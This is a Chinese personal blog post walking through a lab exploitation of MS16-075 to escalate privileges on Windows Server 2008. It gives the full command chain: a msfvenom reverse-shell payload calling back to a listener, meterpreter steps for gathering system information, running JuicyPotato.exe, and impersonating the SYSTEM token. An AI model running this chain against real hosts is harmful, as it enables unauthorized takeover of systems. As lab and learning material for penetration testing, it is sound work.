ms-16075提权Windows Server 2008


光看网上的文章是不够的,还是要多动手才行

ms16-075漏洞简介

Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
漏洞详情,请戳这里

开始动手

1.假设是msfvenom生成木马,目标执行了,监听会话,获得meterpreter会话权限

msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.0.103 lport=4444 -f exe > shell.exe

2.先看一下当前权限(确保我没有作弊)

3.查看系统信息,并导出

# (进入cmd)
shell
chcp   65001     # 将编码格式改为utf-8中文
systeminfo >> c:\out.txt   将系统信息输出到out.txt文件

4.在meterpreter把结果文件下载到本地

download   D:\\xxxx\\upload\\out.txt   /tmp/out.txt    

5.这里选择Windows-Exploit-Suggeste提权辅助工具,对结果文件在本地进行分析, 查找系统未打补丁有哪些

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -i out.txt -d 2020-05-09-mssb.xls -l  # -i是systeminfo的结果文件

可以看到可能存在ms16-075漏洞

6.开始验证

# 上传ms16-075的exp: JuicyPotato.exe至靶机
upload /root/Desktop/JuicyPotato.exe  C:\\

execute -cH -f  C:\\JuicyPotato.exe    # 执行poc(前面已经把poc上传到目标了), 创建新的进程
impersonate_token "NT AUTHORITY\\SYSTEM"    # 窃取, 假冒目标主机上的可用令牌

7.查看当前权限,提取成功

getuid                # 查看当前权限

8.后面的事情,嘿嘿你懂得

这里只是没有防护的情况下的一次简单实验,有点简陋有点水


文章作者: 剑胆琴心
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 剑胆琴心 !
评论
 上一篇
Metasploit初学-散记 Metasploit初学-散记
MSF 最牛X的地方是:支持整个渗透测试过程 理论方面 技术架构1.辅助模块(auxiliary)包含了扫描、嗅探、指纹识别、网络欺骗等相关功能模块 2.渗透攻击模块(exploits)利用程序,针对漏洞、权限进行利用,是主要使用的模块
2020-05-09
下一篇 
python进程之间全局锁(GIL) python进程之间全局锁(GIL)
感觉这篇文章写的不错: 点击这里 document.querySelectorAll('.github-emoji') .forEach(el => { if (!el.data
2020-05-08
  目录